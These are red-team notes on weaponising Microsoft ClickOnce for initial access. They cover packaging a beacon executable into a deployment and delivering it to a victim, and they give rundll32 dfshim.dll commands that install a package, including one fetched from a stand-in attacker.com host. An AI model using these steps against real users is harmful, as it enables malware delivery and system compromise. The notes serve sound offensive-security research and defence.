# ClickOnce ## Lingo * **ClickOnce** - a technology used to install/deploy an application. This technology can be used install just about anything: * Google Chrome or other third party applications * Microsoft patches, updates * .NET programs along with all their dependencies and resources * **ClickOnce package** - a collection of at least **three** files: * `program.exe` - program that is being deployed via ClickOnce (typically that's **.NET assembly**) * `program.exe.manifest` - XML manifest that describes executable properties (UAC, dependencies, assembly identity, etc) * `program.application` - XML manifest **that describes how ClickOnce provisions this program**, where to find executables and their manifests * **ClickOnce deployment** - a program, along with ClickOnce manifests, that will be deployed with ClickOnce technology (so simply put: `chrome.exe + .application + .exe.manifest`) ## Typical Weaponisation Workflow Typically when we set out to weaponise ClickOnce, we'll be wanting to firstly come up with an EXE application and then turn it into ClickOnce deployment. In that sense, we can deploy any executable with ClickOnce, as long as there're ClickOnce required files scattered around (namely `.application` and `.manifest`). So, simply put: 1. We can compile our own .EXE program (be it .NET assembly or `beacon.exe` or by abusing MS Signed EXE) 2. Then generate required `program.application` and `program.exe.manifest` files 3. Once we have both of these, we could either upload all the files to the Web Server for Online deployment or deliver them offline to the victim (in a container of some sort) ## Testing your Deployments We can install and uninstall ClickOnce deployments from command line with following commands: - You can install ClickOnce deployment from cmdline with: ``` cmd> rundll32.exe dfshim.dll,ShOpenVerbApplication C:\click-beacon\beacon.application ``` - Or install it from URL with: ``` cmd> rundll32.exe dfshim.dll,ShOpenVerbApplication https://attacker.com/beacon.application ``` - And then uninstall with: ``` cmd> rundll32.exe dfshim.dll,ShArpMaintain beacon.application ``` ## ClickOnce provisioning Modes ### Offline only All ClickOnce manifests and application dependencies included within an archive (ISO, ZIP) and such package can be installed offline. In this mode, there will be only one change made to the system: - Directory will be created with all package files in: `%LOCALAPPDATA%\Apps\2.0\` ### Online or Offline Marks the package to be deployed either offline (so locally from files), or online through the use of `.appref-ms` file or by pointing user to `http://attacker.com/evil.application` URL. Whenever user decides to install such package, there will be following changes introduced to the system: - **registry key** * `HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\` * **Directory & Files** * `%APPDATA%\Microsoft\Windows\Start Menu\Programs\\` * `%LOCALAPPDATA%\Apps\2.0\` For more information, refer to: - [William Burke - CLICKONCE AND YOU'RE IN](https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf) ## Online Examples ClickOnce deployments published on my [binary-offensive.com](binary-offensive.com): - 1) Runs calc.exe, online only, wasn't signed, URL: [https://binary-offensive.com/files/c1/calc1-unsigned/clickonce1.application](https://binary-offensive.com/files/c1/calc1-unsigned/clickonce1.application) - 2) Runs calc.exe, online only, signed with MSI leaked cert, URL: [https://binary-offensive.com/files/c1/calc1-signed/clickonce1.application](https://binary-offensive.com/files/c1/calc1-signed/clickonce1.application) - 3) Runs calc.exe, online and offline, wasn't signed, URL: [https://binary-offensive.com/files/c2/calc1-unsigned/clickonce1.application](https://binary-offensive.com/files/c2/calc1-unsigned/clickonce1.application) - 4) Runs calc.exe, online and offline, signed with MSI leaked cert, URL: [https://binary-offensive.com/files/c2/calc1-signed/clickonce1.application](https://binary-offensive.com/files/c2/calc1-signed/clickonce1.application) ## More Information More Information on ClickOnce & VSTO Reading suggested in below sorted order 😎 ### Articles: - [All you need is one - a ClickOnce love story](https://www.netspi.com/blog/technical/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/) - [ClickOnce twice or thrice - a technique for social engineering and untrusted command execution](https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/) - [One Click to compromise fun with](https://blog.redxorblue.com/2020/07/one-click-to-compromise-fun-with.html) ### Talks: - [(slides) ClickOnce And You're In When Appref Ms Abuse Is Operating As Intended](https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf) - [(whitepaper) ClickOnce And You're In When Appref Ms Abuse Is Operating As Intended](https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf) - [DEF CON 30 - Nick Powers, Steven Flores – ClickOnce AbUse for Trusted Code Execution](https://www.youtube.com/watch?v=cyHxoKvD8Ck) ### VSTO: - [Make phishing great again. VSTO office files are the new macro nightmare?](https://medium.com/@airlockdigital/make-phishing-great-again-vsto-office-files-are-the-new-macro-nightmare-e09fcadef010) - [VSTO: THE PAYLOAD INSTALLER THAT PROBABLY DEFEATS YOUR APPLICATION WHITELISTING RULES](https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/) ### Tools: - [ClickOnceHunter](https://github.com/zyn3rgy/ClickonceHunter) - [AssemblyHunter](https://github.com/0xthirteen/AssemblyHunter) - [MaliciousClickOnceGenerator](https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator) ### Docs and questions: - [MSDN - walkthrough - manually deploying a ClickOnce application](https://learn.microsoft.com/en-us/visualstudio/deployment/walkthrough-manually-deploying-a-clickonce-application?view=vs-2019) - [ClickOnce runtime dfsvc.exe](https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe)